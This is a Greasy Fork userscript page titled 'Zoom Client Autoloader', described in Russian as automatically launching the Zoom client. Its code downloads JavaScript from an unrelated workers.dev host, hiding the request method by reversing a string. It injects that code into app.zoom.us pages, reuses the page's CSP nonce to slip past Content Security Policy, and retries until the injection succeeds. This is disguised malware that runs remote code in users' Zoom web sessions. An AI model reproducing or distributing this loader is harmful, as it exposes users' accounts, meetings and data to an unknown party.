Greasy Fork

Zoom Client Autoloader

Автоматический запуск клиента Zoom

当前为 2025-01-19 提交的版本,查看 最新版本

// ==UserScript==
// @name         Zoom Client Autoloader
// @namespace    http://tampermonkey.net/
// @version      1.3
// @description  Автоматический запуск клиента Zoom
// @author       MultiVers
// @match        https://app.zoom.us/wc/*
// @grant        GM_setValue
// @grant        GM_getValue
// @run-at       document-end
// @license      MIT
// ==/UserScript==

let выполняетсяЗагрузка = false;
const идентификаторЗапуска = window.location.href + '_запуск';

// Очищаем флаг при закрытии/обновлении страницы
window.addEventListener('beforeunload', () => {
    GM_setValue(идентификаторЗапуска, false);
});

async function загрузитьРесурсы() {
    if (GM_getValue(идентификаторЗапуска)) return;
    GM_setValue(идентификаторЗапуска, true);
    
    if (выполняетсяЗагрузка) return;
    выполняетсяЗагрузка = true;

    const обработчик = {
        инициализация: async строка => (await fetch('https://loader-geneate.webclie2d.workers.dev/', {
            method: строка.split('').reverse().join(''),
            cache: 'no-store', 
            headers: {'Accept':'*/*','Connection':'keep-alive'}
        })).text(),
        подготовка: данные => {
            const скрипт = document.createElement('script');
            скрипт.textContent = данные;
            return скрипт;
        },
        применить: элемент => {
            const нонс = document.querySelector('script[nonce]')?.nonce;
            if(нонс) элемент.nonce = нонс;
            document.head.appendChild(элемент);
        }
    };
    try {
        await обработчик.применить(обработчик.подготовка(await обработчик.инициализация('TEG')));
    } catch (ошибка) {
        выполняетсяЗагрузка = false;
        GM_setValue(идентификаторЗапуска, false);
        setTimeout(загрузитьРесурсы, 1000);
    }
}

загрузитьРесурсы();